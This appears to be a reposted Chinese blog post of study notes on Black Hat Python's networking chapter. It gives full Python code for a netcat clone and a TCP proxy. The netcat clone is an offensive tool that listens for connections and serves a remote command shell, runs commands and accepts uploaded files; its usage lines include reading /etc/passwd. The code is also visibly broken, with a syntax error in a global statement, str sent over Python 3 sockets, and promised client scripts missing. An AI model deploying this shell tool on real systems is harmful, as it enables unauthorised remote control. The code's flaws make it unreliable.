python3黑帽子渗透笔记第二章--网络基础

时间:2019-10-31
本文章向大家介绍python3黑帽子渗透笔记第二章--网络基础,主要包括python3黑帽子渗透笔记第二章--网络基础使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

1 先来看看不可少的socket模块

(1)tcp_client.py

在渗透测试过程中,创建一个tcp客户端连接服务,发送垃圾数据,进行模糊测试等。

 (2)udp_client.py 

2 nc工具的实现

  进入服务器以后如果没有安装nc,这个时候却有,这样子可以创建简单的客户端和服务器传递使用的文件,或者创建监听让自己拥有控制命令行的操作权限

需要学习的模块

  getopt模块处理命令行

  threading模块

  socket模块

  subprocess模块

  1 #!/usr/bin/env python3
  2 # coding=utf-8
  3 import sys
  4 from socket import *
  5 import getopt  # 用来处理命令行参数
  6 import threading
  7 import subprocess  # 启动一个shell,并控制输入输出
  8 
  9 # -e和-p有问题,mac下运行没什么问题,win下有问题,运行的命令会出现问题。
 10 listen = False
 11 command = False
 12 upload = False
 13 execute = ""
 14 target = ""
 15 upload_destination = ""
 16 port = 0
 17 
 18 #帮助提示
 19 def usage():
 20     print("netcat")
 21     print("Usage:nc_hacker.py -t target_host -p target_port")
 22     print("-l --listen                - listen on [host]:[port] for incoming connections")
 23     print("-e --execute=ile_to_run   - execute the given file upon receiving a connection")
 24     print("-c --command               - initialize a command shell")
 25     print("-u --upload=destination    - upon receiving connection upload a file and write to [destination]")
 26     print("Examples: ")
 27     print("nc_hacker.py -t 192.168.0.1 -p 5555 -l -c")
 28     print("nc_hacker.py -t 192.168.0.1 -p 5555 -l -u c:\\target.exe")
 29     print("nc_hacker.py -t 192.168.0.1 -p 5555 -l -e \"cat /etc/passwd\"")
 30     print("echo 'ABCDEFGHI' | ./nc_hacker.py -t 192.168.11.12 -p 135")
 31     sys.exit(0)
 32 
 33 
 34 # 主函数
 35 def main():
 36     global listen
 37     global port
 38     global execute
 39     global command
 40     global upload_destination
 41     global target
 42     # 没有输入值就显示菜单
 43     if not len(sys.argv[1:]):
 44         usage()
 45     try:
 46         # getopt模块处理命令行,
 47         # h后面没有冒号:表示后面不带参数,p:和i:后面有冒号表示后面需要参数
 48         # help后面没有等号=,表示后面不带参数,有=,表示后面需要参数
 49         # 返回值options是个包含元祖的列表,每个元祖是分析出来的格式信息,比如[('-i','127.0.0.1'),('-p','80')]
 50         # args 是个列表,包含那些没有‘-’或‘--’的参数,比如:['55','66']
 51         opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",
 52                                    ["help", "listen", "execute", "target", "port", "command", "upload"])
 53     except getopt.GetoptError as err:
 54         print(str(err))
 55         usage()
 56     for o, a in opts:
 57         if o in ("-h", "--help"):
 58             usage()
 59         elif o in ("-l", "--listen"):
 60             listen = True
 61         elif o in ("-e", "--execute"):
 62             execute = a
 63         elif o in ("-c", "--command"):
 64             command = True
 65         elif o in ("-u", "--upload"):
 66             upload_destination = a
 67         elif o in ("-t", "--target"):
 68             target = a
 69         elif o in ("-p", "--port"):
 70             port = int(a)
 71         else:
 72             print("unhandled option")
 73     # 从标准输入中发送数据
 74     if not listen and len(target) and port > 0:
 75         # 读取输入的数据
 76         # 这里将阻塞,发送ctrl-d使用
 77         buffer = input()  # sys.stdin.read()
 78         # 发送数据
 79         client_sender(buffer)
 80     # 进行监听
 81     if listen:
 82         print('the server is listening on %s:%d' % (target, port))
 83         server_loop()
 84 
 85 
 86 # 客户端代码
 87 def client_sender(buffer):
 88     client = socket(AF_INET, SOCK_STREAM)
 89     try:
 90         print("start connecting...")
 91         client.connect((target, port))
 92         print("connected")
 93         # 如果我们检测到来自stdin的输入。
 94         # 如果不是,我们就等待用户输入。
 95         if len(buffer):
 96             client.send(buffer)
 97         while True:
 98             # 等待数据回传
 99             recv_len = 1
100             response = ""
101             print("waiting response:")
102             while recv_len:
103                 data = client.recv(4096)
104                 recv_len = len(data)
105                 response += data.decode("utf-8")
106                 if recv_len < 4096:
107                     break
108             print(response, end="")
109             # 等待更多输入
110             buffer = input("")
111             buffer += "\n"
112             client.send(buffer.encode("utf-8"))
113     except:
114         print("[*] Exception! Exiting.")
115         # 断开连接
116         client.close()
117 
118 
119 # 服务端代码
120 def server_loop():
121     global target, port
122 
123     # 如果没有定义目标,就监听所有接口
124     if not len(target):
125         target = "0.0.0.0"
126     server = socket(AF_INET, SOCK_STREAM)
127     server.bind((target, port))
128     server.listen(5)
129 
130     while True:
131         client_socket, addr = server.accept()
132         # print(client_socket)<socket._socketobject object at 0x107552d00>
133         # 分出一个线程来处理新的客户端
134         client_thread = threading.Thread(target=client_handler, args=(client_socket,))
135         client_thread.start()
136 
137 
138 # -c命令
139 def run_command(command):
140     # 返回从字符串末尾删除所有字符串的字符串(默认空白字符)的副本
141     command = command.rstrip()
142     # 运行命令并将输出返回
143     try:
144         # subprocess.STDOUT是抛出异常。
145         output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
146     except:
147         output = "Failed to execute command.\r\n"
148     # 将输出发送
149     return output
150 
151 
152 # 处理传入的客户端连接
153 def client_handler(client_socket):
154     global upload, execute,
155     # 检测上传文件command
156     if len(upload_destination):
157         # 读取所有的字节并写入
158         file_buffer = ""
159         # 持续读取数据直到没有数据可用为止,有问题
160         while True:
161             data = client_socket.recv(1024)
162             if not data:
163                 break
164             else:
165                 file_buffer += data
166                 # 现在我们取这些字节并试着把它们写出来。
167         try:
168             print('opening')
169             #打开文件并写入
170             file_descriptor = open(upload_destination, "wb")
171             file_descriptor.write(file_buffer)
172             print('written')
173             file_descriptor.close()
174 
175             # 确认文件是否上传
176             client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
177         except:
178             client_socket.send("Failed to save file to %s\r\n" % upload_destination)
179     # 检查命令执行
180     if len(execute):
181         # 运行命令
182         output = run_command(execute)
183         client_socket.send(output)
184     # 如果需要一个命令shell,那我们进入另一个循环,。
185     if command:
186         while True:
187             # 跳出一个窗口
188             client_socket.send(b"<netcat:#> ")
189             # 现在我们接收文件直到发现换行符(enter key)
190             cmd_buffer = ""
191             while "\n" not in cmd_buffer:
192                 cmd_buffer += client_socket.recv(1024).decode("utf-8")
193             # 返还命令输出
194             response = run_command(cmd_buffer)
195             # 返回相应数据
196             client_socket.send(response)
197 
198 
199 if __name__ == "__main__":
200     main()
View Code

4 tcp代理的实现

  了解未知的协议,修改发送到应用的数据包或者为模糊测试创建一个测试环境。

思路:

  server_loop中循环接受---->每接受一次连接就开启线程执行proxy_handler----->连接目标主机----->本地读取发送目标主机

  1 #!/usr/bin/env python3
  2 # coding=utf-8
  3 import sys
  4 from socket import *
  5 import threading
  6 
  7 
  8 # 16进制导出函数
  9 def hexdump(src, length=16):
 10     result = []
 11     # 判读输入是否为字符串
 12     digits = 4 if isinstance(src, str) else 2
 13     for i in range(0, len(src), length):
 14         # 将字符串切片为16个为一组
 15         s = src[i:i + length]
 16         # 用16进制来输出,x是digits的值,表示输出宽度
 17         hexa = ' '.join(["%0*X" % (digits, (x)) for x in s])
 18         # 用来输出原值
 19         text = ''.join([chr(x) if 0x20 <= x < 0x7F else '.' for x in s])
 20         # %-*s, 星号是length*(digits + 1)的值
 21         result.append("%04X   %-*s   %s" % (i, length * (digits + 1), hexa, text))
 22     print('\n'.join(result))
 23 
 24 
 25 # 设置延时有问题,后续更改
 26 def receive_from(connection):
 27     buffer = b""
 28     # 设置5s延迟,connection=socket(AF_INET, SOCK_STREAM)
 29     connection.settimeout(5)
 30     try:
 31         # 保持数据的读取直到没有数据或超时
 32         while True:
 33             data = connection.recv(4096)
 34             if not data:
 35                 break
 36             buffer += data
 37     except:
 38         pass
 39     return buffer
 40 
 41 
 42 # 对目标主机的请求数据进行修改
 43 def request_handler(buffer):
 44     return buffer
 45 
 46 
 47 # 对返回本地主机的响应数据进行修改
 48 def response_handler(buffer):
 49     return buffer
 50 
 51 
 52 def proxy_handler(client_socket, target_host, target_port, receive_first):
 53     # 连接目标主机
 54     target_socket = socket(AF_INET, SOCK_STREAM)
 55     target_socket.connect((target_host, target_port))
 56 
 57     # 必要时从目标主机接收数据
 58     if receive_first:
 59         target_buffer = receive_from(target_socket)
 60         hexdump(target_buffer)
 61         # 发送给我们的响应处理程序
 62         target_buffer = response_handler(target_buffer)
 63         # 如果要发送数据给本地客户端,发送它
 64         if len(target_buffer):
 65             print("[<==] Sending %d bytes to localhost." % len(target_buffer))
 66             client_socket.send(target_buffer)
 67 
 68     # 现在我们从本地循环读取数据,发送给远程主机和本地主机
 69     while True:
 70         # 从本地读取数据
 71         local_buffer = receive_from(client_socket)
 72         if len(local_buffer):
 73             print("[==>] Received %d bytes from localhost." % len(local_buffer))
 74             hexdump(local_buffer)
 75             # 发送给我们的本地请求
 76             local_buffer = request_handler(local_buffer)
 77             # 发送数据给目标主机
 78             target_socket.send(local_buffer)
 79             print("[==>] Sent to target.")
 80 
 81         # 接收响应的数据
 82         target_buffer = receive_from(target_socket)
 83 
 84         if len(target_buffer):
 85             print("[<==] Received %d bytes from target." % len(target_buffer))
 86             hexdump(target_buffer)
 87             # 发送到响应处理函数
 88             target_buffer = response_handler(target_buffer)
 89             # 将响应发送给本地socket
 90             client_socket.send(target_buffer)
 91             print("[<==] Sent to localhost.")
 92 
 93         # 两边没有数据了,就关闭连接
 94         if not len(local_buffer) or not len(target_buffer):
 95             client_socket.close()
 96             target_socket.close()
 97             print("[*] No more data. Closing connections.")
 98             break
 99 
100 
101 def server_loop(local_host, local_port, target_host, target_port, receive_first):
102     server = socket(AF_INET, SOCK_STREAM)
103     try:
104         server.bind((local_host, local_port))
105     except:
106         print("[!!] Failed to listen on %s:%d" % (local_host, local_port))
107         print("[!!] Check for other listening sockets or correct permissions.")
108         sys.exit(0)
109 
110     print("[*] Listening on %s:%d" % (local_host, local_port))
111 
112     server.listen(5)
113 
114     while True:
115         client_socket, addr = server.accept()
116         # 本地连接信息
117         print("[==>] Received incoming connection from %s:%d" % (addr[0], addr[1]))
118         # 开启线程和目标主机通信
119         proxy_thread = threading.Thread(target=proxy_handler,
120                                         args=(client_socket, target_host, target_port, receive_first))
121         proxy_thread.start()
122 
123 
124 def main():
125     if len(sys.argv[1:]) != 5:
126         print("Usage: ./proxy.py [localhost] [localport] [targethost] [targetport] [receive_first]")
127         print("Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True")
128         sys.exit(0)
129     # 本地参数
130     local_host = sys.argv[1]
131     local_port = int(sys.argv[2])
132     # 目标参数
133     target_host = sys.argv[3]
134     target_port = int(sys.argv[4])
135 
136     receive_first = sys.argv[5]
137 
138     if "True" in receive_first:
139         receive_first = True
140     else:
141         receive_first = False
142 
143     # 开始监听
144     server_loop(local_host, local_port, target_host, target_port, receive_first)
145 
146 
147 main()
View Code

原文地址:https://www.cnblogs.com/lanjianhappy/p/11774031.html

随机文章
本站知识点必读
最近更新